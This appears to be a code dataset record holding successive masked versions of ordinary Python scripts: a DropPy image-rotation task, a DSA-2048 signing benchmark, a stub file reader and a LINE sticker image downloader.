sys.exit('Argument expand invalid')
for item_name in os.listdir(input_dir):
item_path = os.path.join(input_dir, item_name)
if os.path.isfile(item_path):
self.rotate_file(item_path, output_dir, degrees, expand)
elif os.path.isdir(item_path):
output_sub_dir = os.path.join(output_dir, item_name)
os.makedirs(output_sub_dir)
contained_files = get_file_paths_from_directory(item_path)
for contained_file in contained_files:
self.rotate_file(contained_file, output_sub_dir,
degrees, expand)
@staticmethod
def rotate_file(input_file, output_dir, degrees, expand):
output_file_name = os.path.basename(input_file)
output_file = os.path.join(output_dir, output_file_name)
input_image = Image.open(input_file)
output_image = input_image.rotate(degrees, expand=expand)
output_image.save(output_file)
<|reserved_special_token_1|>
from __future__ import unicode_literals
import os
try:
import Image
except ImportError:
from PIL import Image
import sys
sys.path.append(os.path.abspath(os.path.join(__file__, os.pardir, os.pardir,
'DropPy.Common')))
from file_tools import get_file_paths_from_directory
class Task(object):
"""
Documentation: https://docs.droppyapp.com/tasks/image-rotate
"""
def __init__(self, input_dir, output_dir, **kwargs):
degrees = kwargs.get(str('degrees'), 90.0)
expand_arg = kwargs.get(str('expand'), True)
if expand_arg is True:
expand = 1
elif expand_arg is False:
expand = 0
else:
sys.exit('Argument expand invalid')
for item_name in os.listdir(input_dir):
item_path = os.path.join(input_dir, item_name)
if os.path.isfile(item_path):
self.rotate_file(item_path, output_dir, degrees, expand)
elif os.path.isdir(item_path):
output_sub_dir = os.path.join(output_dir, item_name)
os.makedirs(output_sub_dir)
contained_files = get_file_paths_from_directory(item_path)
for contained_file in contained_files:
self.rotate_file(contained_file, output_sub_dir,
degrees, expand)
@staticmethod
def rotate_file(input_file, output_dir, degrees, expand):
output_file_name = os.path.basename(input_file)
output_file = os.path.join(output_dir, output_file_name)
input_image = Image.open(input_file)
output_image = input_image.rotate(degrees, expand=expand)
output_image.save(output_file)
<|reserved_special_token_1|>
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
try:
import Image
except ImportError:
from PIL import Image
import sys
sys.path.append(os.path.abspath(os.path.join(__file__, os.pardir, os.pardir, 'DropPy.Common')))
from file_tools import get_file_paths_from_directory
class Task(object):
"""
Documentation: https://docs.droppyapp.com/tasks/image-rotate
"""
def __init__(self, input_dir, output_dir, **kwargs):
# Get keyword arguments.
degrees = kwargs.get(str('degrees'), 90.0)
expand_arg = kwargs.get(str('expand'), True)
# Check arguments.
if expand_arg is True:
expand = 1
elif expand_arg is False:
expand = 0
else:
sys.exit('Argument expand invalid')
# Process files and directories.
for item_name in os.listdir(input_dir):
item_path = os.path.join(input_dir, item_name)
if os.path.isfile(item_path):
self.rotate_file(item_path, output_dir, degrees, expand)
elif os.path.isdir(item_path):
output_sub_dir = os.path.join(output_dir, item_name)
os.makedirs(output_sub_dir)
contained_files = get_file_paths_from_directory(item_path)
for contained_file in contained_files:
self.rotate_file(contained_file, output_sub_dir, degrees, expand)
@staticmethod
def rotate_file(input_file, output_dir, degrees, expand):
output_file_name = os.path.basename(input_file)
output_file = os.path.join(output_dir, output_file_name)
input_image = Image.open(input_file)
output_image = input_image.rotate(degrees, expand=expand)
output_image.save(output_file)
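
A hedged usage sketch for the task above; in DropPy the framework supplies the directories itself, so the paths here are placeholders:

in_dir, out_dir = '/tmp/droppy_in', '/tmp/droppy_out'  # placeholder paths
if not os.path.exists(out_dir):  # the task writes into an existing output dir
    os.makedirs(out_dir)
Task(in_dir, out_dir, degrees=90.0, expand=True)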
|
flexible
|
{
"blob_id": "df3208a00f7a5dd1ddd76542ac0de85762cc45ab",
"index": 7236,
"step-1": "<mask token>\n\n\nclass Task(object):\n <mask token>\n <mask token>\n\n @staticmethod\n def rotate_file(input_file, output_dir, degrees, expand):\n output_file_name = os.path.basename(input_file)\n output_file = os.path.join(output_dir, output_file_name)\n input_image = Image.open(input_file)\n output_image = input_image.rotate(degrees, expand=expand)\n output_image.save(output_file)\n",
"step-2": "<mask token>\n\n\nclass Task(object):\n <mask token>\n\n def __init__(self, input_dir, output_dir, **kwargs):\n degrees = kwargs.get(str('degrees'), 90.0)\n expand_arg = kwargs.get(str('expand'), True)\n if expand_arg is True:\n expand = 1\n elif expand_arg is False:\n expand = 0\n else:\n sys.exit('Argument expand invalid')\n for item_name in os.listdir(input_dir):\n item_path = os.path.join(input_dir, item_name)\n if os.path.isfile(item_path):\n self.rotate_file(item_path, output_dir, degrees, expand)\n elif os.path.isdir(item_path):\n output_sub_dir = os.path.join(output_dir, item_name)\n os.makedirs(output_sub_dir)\n contained_files = get_file_paths_from_directory(item_path)\n for contained_file in contained_files:\n self.rotate_file(contained_file, output_sub_dir,\n degrees, expand)\n\n @staticmethod\n def rotate_file(input_file, output_dir, degrees, expand):\n output_file_name = os.path.basename(input_file)\n output_file = os.path.join(output_dir, output_file_name)\n input_image = Image.open(input_file)\n output_image = input_image.rotate(degrees, expand=expand)\n output_image.save(output_file)\n",
"step-3": "<mask token>\n\n\nclass Task(object):\n \"\"\"\n Documentation: https://docs.droppyapp.com/tasks/image-rotate\n \"\"\"\n\n def __init__(self, input_dir, output_dir, **kwargs):\n degrees = kwargs.get(str('degrees'), 90.0)\n expand_arg = kwargs.get(str('expand'), True)\n if expand_arg is True:\n expand = 1\n elif expand_arg is False:\n expand = 0\n else:\n sys.exit('Argument expand invalid')\n for item_name in os.listdir(input_dir):\n item_path = os.path.join(input_dir, item_name)\n if os.path.isfile(item_path):\n self.rotate_file(item_path, output_dir, degrees, expand)\n elif os.path.isdir(item_path):\n output_sub_dir = os.path.join(output_dir, item_name)\n os.makedirs(output_sub_dir)\n contained_files = get_file_paths_from_directory(item_path)\n for contained_file in contained_files:\n self.rotate_file(contained_file, output_sub_dir,\n degrees, expand)\n\n @staticmethod\n def rotate_file(input_file, output_dir, degrees, expand):\n output_file_name = os.path.basename(input_file)\n output_file = os.path.join(output_dir, output_file_name)\n input_image = Image.open(input_file)\n output_image = input_image.rotate(degrees, expand=expand)\n output_image.save(output_file)\n",
"step-4": "from __future__ import unicode_literals\nimport os\ntry:\n import Image\nexcept ImportError:\n from PIL import Image\nimport sys\nsys.path.append(os.path.abspath(os.path.join(__file__, os.pardir, os.pardir,\n 'DropPy.Common')))\nfrom file_tools import get_file_paths_from_directory\n\n\nclass Task(object):\n \"\"\"\n Documentation: https://docs.droppyapp.com/tasks/image-rotate\n \"\"\"\n\n def __init__(self, input_dir, output_dir, **kwargs):\n degrees = kwargs.get(str('degrees'), 90.0)\n expand_arg = kwargs.get(str('expand'), True)\n if expand_arg is True:\n expand = 1\n elif expand_arg is False:\n expand = 0\n else:\n sys.exit('Argument expand invalid')\n for item_name in os.listdir(input_dir):\n item_path = os.path.join(input_dir, item_name)\n if os.path.isfile(item_path):\n self.rotate_file(item_path, output_dir, degrees, expand)\n elif os.path.isdir(item_path):\n output_sub_dir = os.path.join(output_dir, item_name)\n os.makedirs(output_sub_dir)\n contained_files = get_file_paths_from_directory(item_path)\n for contained_file in contained_files:\n self.rotate_file(contained_file, output_sub_dir,\n degrees, expand)\n\n @staticmethod\n def rotate_file(input_file, output_dir, degrees, expand):\n output_file_name = os.path.basename(input_file)\n output_file = os.path.join(output_dir, output_file_name)\n input_image = Image.open(input_file)\n output_image = input_image.rotate(degrees, expand=expand)\n output_image.save(output_file)\n",
"step-5": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\nimport os\ntry:\n import Image\nexcept ImportError:\n from PIL import Image\nimport sys\n\nsys.path.append(os.path.abspath(os.path.join(__file__, os.pardir, os.pardir, 'DropPy.Common')))\nfrom file_tools import get_file_paths_from_directory\n\n\nclass Task(object):\n \"\"\"\n Documentation: https://docs.droppyapp.com/tasks/image-rotate\n \"\"\"\n def __init__(self, input_dir, output_dir, **kwargs):\n # Get keyword arguments.\n degrees = kwargs.get(str('degrees'), 90.0)\n expand_arg = kwargs.get(str('expand'), True)\n\n # Check arguments.\n if expand_arg is True:\n expand = 1\n elif expand_arg is False:\n expand = 0\n else:\n sys.exit('Argument expand invalid')\n\n # Process files and directories.\n for item_name in os.listdir(input_dir):\n item_path = os.path.join(input_dir, item_name)\n\n if os.path.isfile(item_path):\n self.rotate_file(item_path, output_dir, degrees, expand)\n\n elif os.path.isdir(item_path):\n output_sub_dir = os.path.join(output_dir, item_name)\n os.makedirs(output_sub_dir)\n\n contained_files = get_file_paths_from_directory(item_path)\n for contained_file in contained_files:\n self.rotate_file(contained_file, output_sub_dir, degrees, expand)\n\n @staticmethod\n def rotate_file(input_file, output_dir, degrees, expand):\n output_file_name = os.path.basename(input_file)\n output_file = os.path.join(output_dir, output_file_name)\n\n input_image = Image.open(input_file)\n output_image = input_image.rotate(degrees, expand=expand)\n output_image.save(output_file)\n",
"step-ids": [
2,
3,
4,
6,
7
]
}
|
[
2,
3,
4,
6,
7
] |
from Crypto.PublicKey import DSA
from Crypto.Signature import DSS
from Crypto.Hash import SHA256
import os
import time
kB = 1024 # 1kB
with open('small_file.txt', 'wb') as f:
f.write(os.urandom(kB))
mB = 10485760 # 10 MB
with open('large_file.txt', 'wb') as f:
f.write(os.urandom(mB))
Begin = time.time()
key = DSA.generate(2048)
with open("public_key.pem", "wb") as f:
f.write(key.publickey().export_key())
End = time.time()
print("Key Generation Time: ", End-Begin)
def DSA_2048(filename,key):
with open(filename, 'rb') as f:
message = f.read()
hash_obj = SHA256.new(message)
signer = DSS.new(key, 'fips-186-3')
signature = signer.sign(hash_obj)
# Load the public key
f = open("public_key.pem", "r")
hash_obj = SHA256.new(message)
pub_key = DSA.import_key(f.read())
verifier = DSS.new(pub_key, 'fips-186-3')
# Verify the authenticity of the message
try:
verifier.verify(hash_obj, signature)
print ("The message is authentic.")
except ValueError:
print ("The message is not authentic.")
Begin=time.time()
DSA_2048('small_file.txt',key)
End=time.time()
print("Time taken for DSA_2048 with 1 kb file: ",End-Begin)
if End-Begin != 0:
print("DSA_2048 speed for 1 kb file: ",1024/(End-Begin),"bytes/sec")
Begin=time.time()
DSA_2048('large_file.txt',key)
End=time.time()
print("Time taken for DSA_2048 with 10 mb file: ",End-Begin)
if End-Begin != 0:
print("DSA_2048 speed for 1 kb file: ",10485760/(End-Begin),"bytes/sec")
exit()
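
A small illustrative sketch (not in the original script, and unreachable after exit()): tampering with a message after signing must make the verifier raise ValueError. The byte strings are placeholders.

msg = b'original payload'  # illustrative bytes
sig = DSS.new(key, 'fips-186-3').sign(SHA256.new(msg))
verifier = DSS.new(key.publickey(), 'fips-186-3')
try:
    verifier.verify(SHA256.new(b'tampered payload'), sig)
    print('unexpectedly verified')
except ValueError:
    print('tampered message correctly rejected')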
|
normal
|
{
"blob_id": "d24bbfc3587a2a79891a11e00ec865498c01c286",
"index": 2101,
"step-1": "<mask token>\n\n\ndef DSA_2048(filename, key):\n with open(filename, 'rb') as f:\n message = f.read()\n hash_obj = SHA256.new(message)\n signer = DSS.new(key, 'fips-186-3')\n signature = signer.sign(hash_obj)\n f = open('public_key.pem', 'r')\n hash_obj = SHA256.new(message)\n pub_key = DSA.import_key(f.read())\n verifier = DSS.new(pub_key, 'fips-186-3')\n try:\n verifier.verify(hash_obj, signature)\n print('The message is authentic.')\n except ValueError:\n print('The message is not authentic.')\n\n\n<mask token>\n",
"step-2": "<mask token>\nwith open('small_file.txt', 'wb') as f:\n f.write(os.urandom(kB))\n<mask token>\nwith open('large_file.txt', 'wb') as f:\n f.write(os.urandom(mB))\n<mask token>\nwith open('public_key.pem', 'wb') as f:\n f.write(key.publickey().export_key())\n f.close()\n<mask token>\nprint('Key Generation Time: ', End - Begin)\n\n\ndef DSA_2048(filename, key):\n with open(filename, 'rb') as f:\n message = f.read()\n hash_obj = SHA256.new(message)\n signer = DSS.new(key, 'fips-186-3')\n signature = signer.sign(hash_obj)\n f = open('public_key.pem', 'r')\n hash_obj = SHA256.new(message)\n pub_key = DSA.import_key(f.read())\n verifier = DSS.new(pub_key, 'fips-186-3')\n try:\n verifier.verify(hash_obj, signature)\n print('The message is authentic.')\n except ValueError:\n print('The message is not authentic.')\n\n\n<mask token>\nDSA_2048('small_file.txt', key)\n<mask token>\nprint('Time taken for DSA_2048 with 1 kb file: ', End - Begin)\nif End - Begin != 0:\n print('DSA_2048 speed for 1 kb file: ', 1024 / (End - Begin), 'bytes/sec')\n<mask token>\nDSA_2048('large_file.txt', key)\n<mask token>\nprint('Time taken for DSA_2048 with 10 mb file: ', End - Begin)\nif End - Begin != 0:\n print('DSA_2048 speed for 1 kb file: ', 10485760 / (End - Begin),\n 'bytes/sec')\nexit()\n",
"step-3": "<mask token>\nkB = 1024\nwith open('small_file.txt', 'wb') as f:\n f.write(os.urandom(kB))\nmB = 10485760\nwith open('large_file.txt', 'wb') as f:\n f.write(os.urandom(mB))\nBegin = time.time()\nkey = DSA.generate(2048)\nwith open('public_key.pem', 'wb') as f:\n f.write(key.publickey().export_key())\n f.close()\nEnd = time.time()\nprint('Key Generation Time: ', End - Begin)\n\n\ndef DSA_2048(filename, key):\n with open(filename, 'rb') as f:\n message = f.read()\n hash_obj = SHA256.new(message)\n signer = DSS.new(key, 'fips-186-3')\n signature = signer.sign(hash_obj)\n f = open('public_key.pem', 'r')\n hash_obj = SHA256.new(message)\n pub_key = DSA.import_key(f.read())\n verifier = DSS.new(pub_key, 'fips-186-3')\n try:\n verifier.verify(hash_obj, signature)\n print('The message is authentic.')\n except ValueError:\n print('The message is not authentic.')\n\n\nBegin = time.time()\nDSA_2048('small_file.txt', key)\nEnd = time.time()\nprint('Time taken for DSA_2048 with 1 kb file: ', End - Begin)\nif End - Begin != 0:\n print('DSA_2048 speed for 1 kb file: ', 1024 / (End - Begin), 'bytes/sec')\nBegin = time.time()\nDSA_2048('large_file.txt', key)\nEnd = time.time()\nprint('Time taken for DSA_2048 with 10 mb file: ', End - Begin)\nif End - Begin != 0:\n print('DSA_2048 speed for 1 kb file: ', 10485760 / (End - Begin),\n 'bytes/sec')\nexit()\n",
"step-4": "from Crypto.PublicKey import DSA\nfrom Crypto.Signature import DSS\nfrom Crypto.Hash import SHA256\nimport os\nimport time\nkB = 1024\nwith open('small_file.txt', 'wb') as f:\n f.write(os.urandom(kB))\nmB = 10485760\nwith open('large_file.txt', 'wb') as f:\n f.write(os.urandom(mB))\nBegin = time.time()\nkey = DSA.generate(2048)\nwith open('public_key.pem', 'wb') as f:\n f.write(key.publickey().export_key())\n f.close()\nEnd = time.time()\nprint('Key Generation Time: ', End - Begin)\n\n\ndef DSA_2048(filename, key):\n with open(filename, 'rb') as f:\n message = f.read()\n hash_obj = SHA256.new(message)\n signer = DSS.new(key, 'fips-186-3')\n signature = signer.sign(hash_obj)\n f = open('public_key.pem', 'r')\n hash_obj = SHA256.new(message)\n pub_key = DSA.import_key(f.read())\n verifier = DSS.new(pub_key, 'fips-186-3')\n try:\n verifier.verify(hash_obj, signature)\n print('The message is authentic.')\n except ValueError:\n print('The message is not authentic.')\n\n\nBegin = time.time()\nDSA_2048('small_file.txt', key)\nEnd = time.time()\nprint('Time taken for DSA_2048 with 1 kb file: ', End - Begin)\nif End - Begin != 0:\n print('DSA_2048 speed for 1 kb file: ', 1024 / (End - Begin), 'bytes/sec')\nBegin = time.time()\nDSA_2048('large_file.txt', key)\nEnd = time.time()\nprint('Time taken for DSA_2048 with 10 mb file: ', End - Begin)\nif End - Begin != 0:\n print('DSA_2048 speed for 1 kb file: ', 10485760 / (End - Begin),\n 'bytes/sec')\nexit()\n",
"step-5": "from Crypto.PublicKey import DSA\nfrom Crypto.Signature import DSS\nfrom Crypto.Hash import SHA256\nimport os\nimport time\n\nkB = 1024 # 1kB\nwith open('small_file.txt', 'wb') as f:\n f.write(os.urandom(kB))\n\nmB = 10485760 # 1GB\nwith open('large_file.txt', 'wb') as f:\n f.write(os.urandom(mB))\n\nBegin = time.time()\nkey = DSA.generate(2048)\nwith open(\"public_key.pem\", \"wb\") as f:\n f.write(key.publickey().export_key())\n f.close()\nEnd = time.time()\nprint(\"Key Generation Time: \", End-Begin)\n\ndef DSA_2048(filename,key):\n with open(filename, 'rb') as f:\n message = f.read()\n hash_obj = SHA256.new(message)\n signer = DSS.new(key, 'fips-186-3')\n signature = signer.sign(hash_obj)\n # Load the public key\n f = open(\"public_key.pem\", \"r\")\n hash_obj = SHA256.new(message)\n pub_key = DSA.import_key(f.read())\n verifier = DSS.new(pub_key, 'fips-186-3')\n # Verify the authenticity of the message\n try:\n verifier.verify(hash_obj, signature)\n print (\"The message is authentic.\")\n except ValueError:\n print (\"The message is not authentic.\")\n\nBegin=time.time()\nDSA_2048('small_file.txt',key)\nEnd=time.time()\nprint(\"Time taken for DSA_2048 with 1 kb file: \",End-Begin)\nif End-Begin != 0:\n print(\"DSA_2048 speed for 1 kb file: \",1024/(End-Begin),\"bytes/sec\")\n\nBegin=time.time()\nDSA_2048('large_file.txt',key)\nEnd=time.time()\nprint(\"Time taken for DSA_2048 with 10 mb file: \",End-Begin)\nif End-Begin != 0:\n print(\"DSA_2048 speed for 1 kb file: \",10485760/(End-Begin),\"bytes/sec\")\nexit()",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Reader:
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Reader:
@staticmethod
def read_file(file_path):
return ''
|
flexible
|
{
"blob_id": "8c51b2c06f971c92e30d6b2d668fdd2fd75142d2",
"index": 4846,
"step-1": "<mask token>\n",
"step-2": "class Reader:\n <mask token>\n",
"step-3": "class Reader:\n\n @staticmethod\n def read_file(file_path):\n return ''\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def saveImg(imgurl, downLoadType):
fileLocation = directoryLocation + '\\' + downLoadType + '\\' + title
if not os.path.exists(fileLocation):
os.makedirs(fileLocation)
file = fileLocation + '\\' + str(count + 1) + '.png'
urlretrieve(imgurl, filename=file)
return file
def getTitle(content):
soup = BeautifulSoup(content, 'html.parser')
title = soup.find('p', 'mdCMN38Item01Ttl').text
return title
def downloadImageList(imgurl):
animationUrl = imgurl[:-7] + '_animation@2x.png'
try:
file = saveImg(animationUrl, '動圖')
apng2gif(file)
except error.URLError as err:
saveImg(imgurl, downLoadType)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
config.read('crawler.config')
<|reserved_special_token_0|>
request.install_opener(opener)
def saveImg(imgurl, downLoadType):
fileLocation = directoryLocation + '\\' + downLoadType + '\\' + title
if not os.path.exists(fileLocation):
os.makedirs(fileLocation)
file = fileLocation + '\\' + str(count + 1) + '.png'
urlretrieve(imgurl, filename=file)
return file
def getTitle(content):
soup = BeautifulSoup(content, 'html.parser')
title = soup.find('p', 'mdCMN38Item01Ttl').text
return title
def downloadImageList(imgurl):
animationUrl = imgurl[:-7] + '_animation@2x.png'
try:
file = saveImg(animationUrl, '動圖')
apng2gif(file)
except error.URLError as err:
saveImg(imgurl, downLoadType)
for i in range(0, len(urlList)):
downLoadType = '貼圖'
content = request.urlopen(urlList[i]).read().decode('utf-8', 'ignore')
rule = '(https.*sticker@2x\\.png)'
ruleEmoji = '(https.*/\\d{3}\\.png)'
title = getTitle(content)
title = re.sub('\\s', '', title)
title = re.sub('[\\W_]+', '', title)
print('開始下載 ' + title)
imglist = re.compile(rule).findall(content)
if len(imglist) == 0:
imglist = re.compile(ruleEmoji).findall(content)
downLoadType = '小表情'
for count in range(0, len(imglist)):
imgurl = downloadImageList(imglist[count])
print('第', count + 1, '張下載完成!')
print('已全部下載完成')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
config = configparser.ConfigParser()
config.read('crawler.config')
directoryLocation = os.getcwd() + '\\img'
urlList = config['lineStoreUrl']['url'].split(',')
downLoadType = '貼圖'
headers = ('User_Agent',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0'
)
opener = request.build_opener()
opener.addheaders = [headers]
request.install_opener(opener)
def saveImg(imgurl, downLoadType):
fileLocation = directoryLocation + '\\' + downLoadType + '\\' + title
if not os.path.exists(fileLocation):
os.makedirs(fileLocation)
file = fileLocation + '\\' + str(count + 1) + '.png'
urlretrieve(imgurl, filename=file)
return file
def getTitle(content):
soup = BeautifulSoup(content, 'html.parser')
title = soup.find('p', 'mdCMN38Item01Ttl').text
return title
def downloadImageList(imgurl):
animationUrl = imgurl[:-7] + '_animation@2x.png'
try:
file = saveImg(animationUrl, '動圖')
apng2gif(file)
except error.URLError as err:
saveImg(imgurl, downLoadType)
for i in range(0, len(urlList)):
downLoadType = '貼圖'
content = request.urlopen(urlList[i]).read().decode('utf-8', 'ignore')
rule = '(https.*sticker@2x\\.png)'
ruleEmoji = '(https.*/\\d{3}\\.png)'
title = getTitle(content)
title = re.sub('\\s', '', title)
title = re.sub('[\\W_]+', '', title)
print('開始下載 ' + title)
imglist = re.compile(rule).findall(content)
if len(imglist) == 0:
imglist = re.compile(ruleEmoji).findall(content)
downLoadType = '小表情'
for count in range(0, len(imglist)):
imgurl = downloadImageList(imglist[count])
print('第', count + 1, '張下載完成!')
print('已全部下載完成')
<|reserved_special_token_1|>
from urllib import request
from urllib import error
from urllib.request import urlretrieve
import os, re
from bs4 import BeautifulSoup
import configparser
from apng2gif import apng2gif
config = configparser.ConfigParser()
config.read('crawler.config')
directoryLocation = os.getcwd() + '\\img'
urlList = config['lineStoreUrl']['url'].split(',')
downLoadType = '貼圖'
headers = ('User_Agent',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0'
)
opener = request.build_opener()
opener.addheaders = [headers]
request.install_opener(opener)
def saveImg(imgurl, downLoadType):
fileLocation = directoryLocation + '\\' + downLoadType + '\\' + title
if not os.path.exists(fileLocation):
os.makedirs(fileLocation)
file = fileLocation + '\\' + str(count + 1) + '.png'
urlretrieve(imgurl, filename=file)
return file
def getTitle(content):
soup = BeautifulSoup(content, 'html.parser')
title = soup.find('p', 'mdCMN38Item01Ttl').text
return title
def downloadImageList(imgurl):
animationUrl = imgurl[:-7] + '_animation@2x.png'
try:
file = saveImg(animationUrl, '動圖')
apng2gif(file)
except error.URLError as err:
saveImg(imgurl, downLoadType)
for i in range(0, len(urlList)):
downLoadType = '貼圖'
content = request.urlopen(urlList[i]).read().decode('utf-8', 'ignore')
rule = '(https.*sticker@2x\\.png)'
ruleEmoji = '(https.*/\\d{3}\\.png)'
title = getTitle(content)
title = re.sub('\\s', '', title)
title = re.sub('[\\W_]+', '', title)
print('開始下載 ' + title)
imglist = re.compile(rule).findall(content)
if len(imglist) == 0:
imglist = re.compile(ruleEmoji).findall(content)
downLoadType = '小表情'
for count in range(0, len(imglist)):
imgurl = downloadImageList(imglist[count])
print('第', count + 1, '張下載完成!')
print('已全部下載完成')
<|reserved_special_token_1|>
from urllib import request
from urllib import error
from urllib.request import urlretrieve
import os, re
from bs4 import BeautifulSoup
import configparser
from apng2gif import apng2gif
config = configparser.ConfigParser()
config.read('crawler.config')
# Where downloads are saved
directoryLocation = os.getcwd() + '\\img'
# Pages to crawl
urlList = config['lineStoreUrl']['url'].split(',')
downLoadType = '貼圖'
# Set the User-Agent
headers = ("User_Agent",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0")
# Build a custom opener
opener = request.build_opener()
opener.addheaders = [headers]
request.install_opener(opener)
def saveImg(imgurl, downLoadType):
fileLocation = directoryLocation + "\\" + downLoadType + "\\" + title
if not os.path.exists(fileLocation):
os.makedirs(fileLocation)
file = fileLocation + "\\" + str(count + 1) + ".png"
urlretrieve(imgurl, filename=file)
return file
def getTitle(content):
soup = BeautifulSoup(content, 'html.parser')
title = soup.find('p', 'mdCMN38Item01Ttl').text
return title
def downloadImageList(imgurl):
    # If an animated version exists, download and convert it; otherwise fall back to the static image
animationUrl = imgurl[:-7] + '_animation@2x.png'
try:
file = saveImg(animationUrl, '動圖')
apng2gif(file)
except error.URLError as err:
saveImg(imgurl, downLoadType)
for i in range(0, len(urlList)):
downLoadType = '貼圖'
content = request.urlopen(urlList[i]).read().decode("utf-8", "ignore")
    rule = '(https.*sticker@2x\.png)'  # regex matching sticker image URLs
ruleEmoji = '(https.*/\d{3}\.png)'
title = getTitle(content)
title = re.sub('\s', '', title)
title = re.sub('[\W_]+', '', title)
print('開始下載 ' + title)
    imglist = re.compile(rule).findall(content)  # collect the image URL list
if len(imglist) == 0:
        imglist = re.compile(ruleEmoji).findall(content)  # fall back to the emoji URL pattern
downLoadType = '小表情'
for count in range(0, len(imglist)):
imgurl = downloadImageList(imglist[count])
print('第', count + 1, '張下載完成!')
print("已全部下載完成")
|
flexible
|
{
"blob_id": "7bcdd6c5c6e41b076e476e1db35b663e34d74a67",
"index": 1885,
"step-1": "<mask token>\n\n\ndef saveImg(imgurl, downLoadType):\n fileLocation = directoryLocation + '\\\\' + downLoadType + '\\\\' + title\n if not os.path.exists(fileLocation):\n os.makedirs(fileLocation)\n file = fileLocation + '\\\\' + str(count + 1) + '.png'\n urlretrieve(imgurl, filename=file)\n return file\n\n\ndef getTitle(content):\n soup = BeautifulSoup(content, 'html.parser')\n title = soup.find('p', 'mdCMN38Item01Ttl').text\n return title\n\n\ndef downloadImageList(imgurl):\n animationUrl = imgurl[:-7] + '_animation@2x.png'\n try:\n file = saveImg(animationUrl, '動圖')\n apng2gif(file)\n except error.URLError as err:\n saveImg(imgurl, downLoadType)\n\n\n<mask token>\n",
"step-2": "<mask token>\nconfig.read('crawler.config')\n<mask token>\nrequest.install_opener(opener)\n\n\ndef saveImg(imgurl, downLoadType):\n fileLocation = directoryLocation + '\\\\' + downLoadType + '\\\\' + title\n if not os.path.exists(fileLocation):\n os.makedirs(fileLocation)\n file = fileLocation + '\\\\' + str(count + 1) + '.png'\n urlretrieve(imgurl, filename=file)\n return file\n\n\ndef getTitle(content):\n soup = BeautifulSoup(content, 'html.parser')\n title = soup.find('p', 'mdCMN38Item01Ttl').text\n return title\n\n\ndef downloadImageList(imgurl):\n animationUrl = imgurl[:-7] + '_animation@2x.png'\n try:\n file = saveImg(animationUrl, '動圖')\n apng2gif(file)\n except error.URLError as err:\n saveImg(imgurl, downLoadType)\n\n\nfor i in range(0, len(urlList)):\n downLoadType = '貼圖'\n content = request.urlopen(urlList[i]).read().decode('utf-8', 'ignore')\n rule = '(https.*sticker@2x\\\\.png)'\n ruleEmoji = '(https.*/\\\\d{3}\\\\.png)'\n title = getTitle(content)\n title = re.sub('\\\\s', '', title)\n title = re.sub('[\\\\W_]+', '', title)\n print('開始下載 ' + title)\n imglist = re.compile(rule).findall(content)\n if len(imglist) == 0:\n imglist = re.compile(ruleEmoji).findall(content)\n downLoadType = '小表情'\n for count in range(0, len(imglist)):\n imgurl = downloadImageList(imglist[count])\n print('第', count + 1, '張下載完成!')\nprint('已全部下載完成')\n",
"step-3": "<mask token>\nconfig = configparser.ConfigParser()\nconfig.read('crawler.config')\ndirectoryLocation = os.getcwd() + '\\\\img'\nurlList = config['lineStoreUrl']['url'].split(',')\ndownLoadType = '貼圖'\nheaders = ('User_Agent',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0'\n )\nopener = request.build_opener()\nopener.addheaders = [headers]\nrequest.install_opener(opener)\n\n\ndef saveImg(imgurl, downLoadType):\n fileLocation = directoryLocation + '\\\\' + downLoadType + '\\\\' + title\n if not os.path.exists(fileLocation):\n os.makedirs(fileLocation)\n file = fileLocation + '\\\\' + str(count + 1) + '.png'\n urlretrieve(imgurl, filename=file)\n return file\n\n\ndef getTitle(content):\n soup = BeautifulSoup(content, 'html.parser')\n title = soup.find('p', 'mdCMN38Item01Ttl').text\n return title\n\n\ndef downloadImageList(imgurl):\n animationUrl = imgurl[:-7] + '_animation@2x.png'\n try:\n file = saveImg(animationUrl, '動圖')\n apng2gif(file)\n except error.URLError as err:\n saveImg(imgurl, downLoadType)\n\n\nfor i in range(0, len(urlList)):\n downLoadType = '貼圖'\n content = request.urlopen(urlList[i]).read().decode('utf-8', 'ignore')\n rule = '(https.*sticker@2x\\\\.png)'\n ruleEmoji = '(https.*/\\\\d{3}\\\\.png)'\n title = getTitle(content)\n title = re.sub('\\\\s', '', title)\n title = re.sub('[\\\\W_]+', '', title)\n print('開始下載 ' + title)\n imglist = re.compile(rule).findall(content)\n if len(imglist) == 0:\n imglist = re.compile(ruleEmoji).findall(content)\n downLoadType = '小表情'\n for count in range(0, len(imglist)):\n imgurl = downloadImageList(imglist[count])\n print('第', count + 1, '張下載完成!')\nprint('已全部下載完成')\n",
